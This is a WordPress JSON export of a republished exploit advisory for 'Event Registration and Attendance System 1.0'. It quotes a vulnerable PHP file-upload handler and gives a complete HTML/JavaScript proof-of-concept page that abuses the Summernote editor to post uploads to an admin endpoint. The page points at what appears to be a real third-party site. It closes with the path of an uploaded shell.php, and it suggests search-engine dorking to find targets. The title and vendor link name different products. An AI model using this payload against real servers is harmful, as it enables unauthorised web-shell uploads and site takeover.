{"id":59028,"date":"2024-08-20T20:49:51","date_gmt":"2024-08-20T17:49:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180245\/eras10-exec.txt"},"modified":"2024-08-20T20:49:51","modified_gmt":"2024-08-20T17:49:51","slug":"event-registration-and-attendance-system-1-0-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/event-registration-and-attendance-system-1-0-code-injection\/","title":{"rendered":"Event Registration and Attendance System 1.0 Code Injection"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/online-news-portal.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] infected item : admin_class.php<\/p>\n<p>$data .= &#8220;, content = &#8216;&#8221;.htmlentities(str_replace(&#8220;&#8216;&#8221;,&#8221;&amp;#x2019;&#8221;,$content)).&#8221;&#8216; &#8220;;<br \/>if(!empty($_FILES[&#8216;cover&#8217;][&#8216;tmp_name&#8217;])){<br \/>$fname = strtotime(date(&#8220;Y-m-d H:i&#8221;)).&#8221;_&#8221;.(str_replace(&#8221; &#8220;,&#8221;-&#8220;,$_FILES[&#8216;cover&#8217;][&#8216;name&#8217;]));<br \/>$move = move_uploaded_file($_FILES[&#8216;cover&#8217;][&#8216;tmp_name&#8217;],&#8217;..\/assets\/uploads\/content_images\/&#8217;. $fname);<br \/>$protocol = strtolower(substr($_SERVER[&#8220;SERVER_PROTOCOL&#8221;],0,5))==&#8217;https&#8217;?&#8217;https&#8217;:&#8217;http&#8217;;<br \/>$hostName = $_SERVER[&#8216;HTTP_HOST&#8217;];<br \/>$path =explode(&#8216;\/&#8217;,$_SERVER[&#8216;PHP_SELF&#8217;]);<br \/>$currentPath = &#8216;\/&#8217;.$path[1]; <br \/>if($move){<br \/>$data .= &#8220;, cover_img=&#8217;$fname&#8217; &#8220;;<br \/>}<br \/>}<\/p>\n[+] Line 27 : Set your target url.<\/p>\n[+] This payload is WYSIWYG based The page can be edited remotely and a malicious executable file can be uploaded ,via summernote is a WYSIWYG editor V: 0.8.18.<\/p>\n[+] save payload as poc.html <\/p>\n[+] payload : <\/p>\n<p>&lt;!DOCTYPE html&gt;<br \/>&lt;html lang=&#8221;en&#8221;&gt;<br \/>&lt;head&gt;<br \/>&lt;meta charset=&#8221;UTF-8&#8243;&gt;<br \/>&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width, initial-scale=1.0&#8243;&gt;<br \/>&lt;title&gt;Manage About Page&lt;\/title&gt;<br \/>&lt;!&#8211; Include Summernote CSS and jQuery &#8211;&gt;<br \/>&lt;link href=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;link href=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/summernote\/0.8.18\/summernote-bs4.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;script src=&#8221;https:\/\/code.jquery.com\/jquery-3.5.1.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;script src=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/js\/bootstrap.bundle.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;script src=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/summernote\/0.8.18\/summernote-bs4.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;\/head&gt;<br \/>&lt;body&gt;<br \/>&lt;div class=&#8221;container mt-5&#8243;&gt;<br \/>&lt;div class=&#8221;col-lg-12&#8243;&gt;<br \/>&lt;div class=&#8221;card card-outline card-primary&#8221;&gt;<br \/>&lt;div class=&#8221;card-body&#8221;&gt;<br \/>&lt;form action=&#8221;&#8221; id=&#8221;manage-about&#8221;&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;textarea name=&#8221;content&#8221; id=&#8221;content&#8221; cols=&#8221;30&#8243; rows=&#8221;10&#8243; class=&#8221;summernote2 form-control&#8221;&gt;<br \/>&lt;p style=&#8221;margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: &#8216;Open Sans&#8217;, Arial, sans-serif; font-size: 14px;&#8221;&gt;indoushka.&lt;\/p&gt;<br \/>&lt;\/textarea&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/form&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;card-footer border-top border-info&#8221;&gt;<br \/>&lt;div class=&#8221;d-flex w-100 justify-content-center align-items-center&#8221;&gt;<br \/>&lt;button class=&#8221;btn btn-flat bg-gradient-primary mx-2&#8243; form=&#8221;manage-about&#8221;&gt;Save&lt;\/button&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<\/p>\n<p>&lt;script&gt;<br \/>$(document).ready(function(){<br \/>\/\/ Initialize Summernote Editor<br \/>$(&#8216;.summernote2&#8217;).summernote({<br \/>height: 300,<br \/>toolbar: [<br \/>[&#8216;style&#8217;, [&#8216;style&#8217;]],<br \/>[&#8216;font&#8217;, [&#8216;bold&#8217;, &#8216;italic&#8217;, &#8216;underline&#8217;, &#8216;strikethrough&#8217;, &#8216;superscript&#8217;, &#8216;subscript&#8217;, &#8216;clear&#8217;]],<br \/>[&#8216;fontname&#8217;, [&#8216;fontname&#8217;]],<br \/>[&#8216;fontsize&#8217;, [&#8216;fontsize&#8217;]],<br \/>[&#8216;color&#8217;, [&#8216;color&#8217;]],<br \/>[&#8216;para&#8217;, [&#8216;ol&#8217;, &#8216;ul&#8217;, &#8216;paragraph&#8217;, &#8216;height&#8217;]],<br \/>[&#8216;table&#8217;, [&#8216;table&#8217;]],<br \/>[&#8216;insert&#8217;, [&#8216;link&#8217;, &#8216;picture&#8217;]],<br \/>[&#8216;view&#8217;, [&#8216;undo&#8217;, &#8216;redo&#8217;, &#8216;fullscreen&#8217;, &#8216;codeview&#8217;, &#8216;help&#8217;]]],<br \/>callbacks: {<br \/>onImageUpload: function(files) {<br \/>saveImg(files[0]); \/\/ Handle image upload<br \/>}<br \/>}<br \/>});<\/p>\n<p>\/\/ Function to save uploaded image<br \/>function saveImg(_file) {<br \/>var data = new FormData();<br \/>data.append(&#8220;file&#8221;, _file);<br \/>$.ajax({<br \/>data: data,<br \/>type: &#8220;POST&#8221;,<br \/>url: &#8220;http:\/\/www.news.witnessradio.org\/admin\/ajax.php?action=save_image&#8221;,<br \/>cache: false,<br \/>contentType: false,<br \/>processData: false,<br \/>success: function(resp) {<br \/>var image = $(&#8216;&lt;img&gt;&#8217;).attr(&#8216;src&#8217;, resp);<br \/>$(&#8216;.summernote2&#8217;).summernote(&#8220;insertNode&#8221;, image[0]);<br \/>}<br \/>});<br \/>}<br \/>});<\/p>\n<p>\/\/ Form Submission<br \/>$(&#8216;#manage-about&#8217;).submit(function(e) {<br \/>e.preventDefault();<br \/>start_load(); \/\/ Start a loading indicator (you need to define this function)<br \/>$.ajax({<br \/>url: &#8216;http:\/\/www.news.witnessradio.org\/admin\/ajax.php?action=save_about&#8217;,<br \/>data: new FormData($(this)[0]),<br \/>cache: false,<br \/>contentType: false,<br \/>processData: false,<br \/>method: &#8216;POST&#8217;,<br \/>type: &#8216;POST&#8217;,<br \/>success: function(resp) {<br \/>if(resp == 1) {<br \/>alert_toast(&#8216;Data successfully saved&#8217;, &#8220;success&#8221;);<br \/>end_load(); \/\/ End the loading indicator (you need to define this function)<br \/>}<br \/>}<br \/>});<br \/>});<\/p>\n<p>\/\/ Optional: Define start_load and end_load functions<br \/>function start_load() {<br \/>\/\/ Add your loading indicator logic here<br \/>}<\/p>\n<p>function end_load() {<br \/>\/\/ Remove your loading indicator logic here<br \/>}<\/p>\n<p>function alert_toast(message, type) {<br \/>alert(message); \/\/ Basic alert. Replace with a better toast notification if needed.<br \/>}<br \/>&lt;\/script&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/p>\n[+] path of evil : http:\/\/127.0.0.1\/news_portal\/assets\/uploads\/content_images\/shell.php<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/online-news-portal.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] infected item : &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59028","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59028","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59028"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59028\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}